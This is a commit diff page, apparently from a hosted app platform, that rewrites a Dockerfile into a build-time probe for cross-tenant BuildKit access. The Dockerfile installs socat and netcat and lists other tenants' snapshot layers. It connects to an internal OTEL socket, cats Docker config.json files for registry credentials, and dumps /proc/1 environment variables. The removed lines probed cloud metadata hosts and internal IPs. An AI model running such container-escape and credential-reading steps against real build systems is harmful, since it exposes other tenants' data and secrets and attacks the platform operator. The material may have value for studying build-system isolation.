Spaces:
Sleeping
Sleeping
Commit ·
f520b7f
1
Parent(s): dbe6944
Test BuildKit snapshot cross-tenant access
Browse files- Dockerfile +32 -20
Dockerfile
CHANGED
|
@@ -1,32 +1,44 @@
|
|
| 1 |
FROM python:3.9-slim
|
| 2 |
|
| 3 |
-
|
| 4 |
-
RUN apt-get update && apt-get install -y curl dnsutils net-tools iproute2 procps 2>/dev/null; true
|
| 5 |
|
| 6 |
-
#
|
| 7 |
-
RUN echo "===
|
| 8 |
-
|
| 9 |
-
RUN nslookup instance-data.ec2.internal 2>&1; true
|
| 10 |
-
RUN nslookup metadata.google.internal 2>&1; true
|
| 11 |
|
| 12 |
-
#
|
| 13 |
-
RUN echo "===
|
| 14 |
-
|
| 15 |
-
RUN curl -v --connect-timeout 3 https://172.20.0.1:443/version -k 2>&1; true
|
| 16 |
|
| 17 |
-
#
|
| 18 |
-
RUN echo "===
|
|
|
|
|
|
|
| 19 |
|
| 20 |
-
#
|
| 21 |
-
RUN echo "===
|
|
|
|
| 22 |
|
| 23 |
-
#
|
| 24 |
-
RUN echo "===
|
|
|
|
| 25 |
|
| 26 |
-
#
|
| 27 |
-
RUN
|
|
|
|
|
|
|
| 28 |
|
| 29 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 30 |
|
|
|
|
|
|
|
| 31 |
EXPOSE 7860
|
| 32 |
CMD ["python", "/app.py"]
|
|
|
|
| 1 |
FROM python:3.9-slim
|
| 2 |
|
| 3 |
+
RUN apt-get update && apt-get install -y curl socat netcat-openbsd 2>/dev/null; true
|
|
|
|
| 4 |
|
| 5 |
+
# Try to access BuildKit snapshots directory
|
| 6 |
+
RUN echo "=== BUILDKIT SNAPSHOTS ===" && \
|
| 7 |
+
ls -la /home/user/.local/share/buildkit/runc-overlayfs/snapshots/snapshots/ 2>&1 | head -30; true
|
|
|
|
|
|
|
| 8 |
|
| 9 |
+
# Try to read other snapshot layers (cross-tenant leakage)
|
| 10 |
+
RUN echo "=== SNAPSHOT 1 ===" && ls -la /home/user/.local/share/buildkit/runc-overlayfs/snapshots/snapshots/1/fs/ 2>&1 | head -10; true
|
| 11 |
+
RUN echo "=== SNAPSHOT 2 ===" && ls -la /home/user/.local/share/buildkit/runc-overlayfs/snapshots/snapshots/2/fs/ 2>&1 | head -10; true
|
|
|
|
| 12 |
|
| 13 |
+
# Try to access the OTEL gRPC socket
|
| 14 |
+
RUN echo "=== OTEL SOCKET ===" && \
|
| 15 |
+
ls -la /dev/otel-grpc.sock 2>&1; true
|
| 16 |
+
RUN echo | socat - UNIX-CONNECT:/dev/otel-grpc.sock 2>&1 | head -5; true
|
| 17 |
|
| 18 |
+
# Try to access BuildKit cache
|
| 19 |
+
RUN echo "=== BUILDKIT CACHE ===" && \
|
| 20 |
+
ls -la /home/user/.local/share/buildkit/ 2>&1 | head -20; true
|
| 21 |
|
| 22 |
+
# Check if we can access /home/user directly
|
| 23 |
+
RUN echo "=== HOME USER ===" && \
|
| 24 |
+
ls -la /home/user/ 2>&1 | head -20; true
|
| 25 |
|
| 26 |
+
# Check for Docker config that might contain registry credentials
|
| 27 |
+
RUN echo "=== DOCKER CONFIG ===" && \
|
| 28 |
+
cat /home/user/.docker/config.json 2>&1; true && \
|
| 29 |
+
cat /root/.docker/config.json 2>&1; true
|
| 30 |
|
| 31 |
+
# Try to escape via /proc/1 to reach buildkitd process
|
| 32 |
+
RUN echo "=== PROC 1 CMDLINE ===" && \
|
| 33 |
+
cat /proc/1/cmdline 2>&1 | tr '\0' ' '; true && \
|
| 34 |
+
echo "" && \
|
| 35 |
+
cat /proc/1/environ 2>&1 | tr '\0' '\n' | head -20; true
|
| 36 |
+
|
| 37 |
+
# Check for parent PID namespace
|
| 38 |
+
RUN echo "=== PARENT PROCS ===" && \
|
| 39 |
+
ls /proc/ 2>&1 | head -30; true
|
| 40 |
|
| 41 |
+
RUN pip install flask
|
| 42 |
+
COPY app.py /app.py
|
| 43 |
EXPOSE 7860
|
| 44 |
CMD ["python", "/app.py"]
|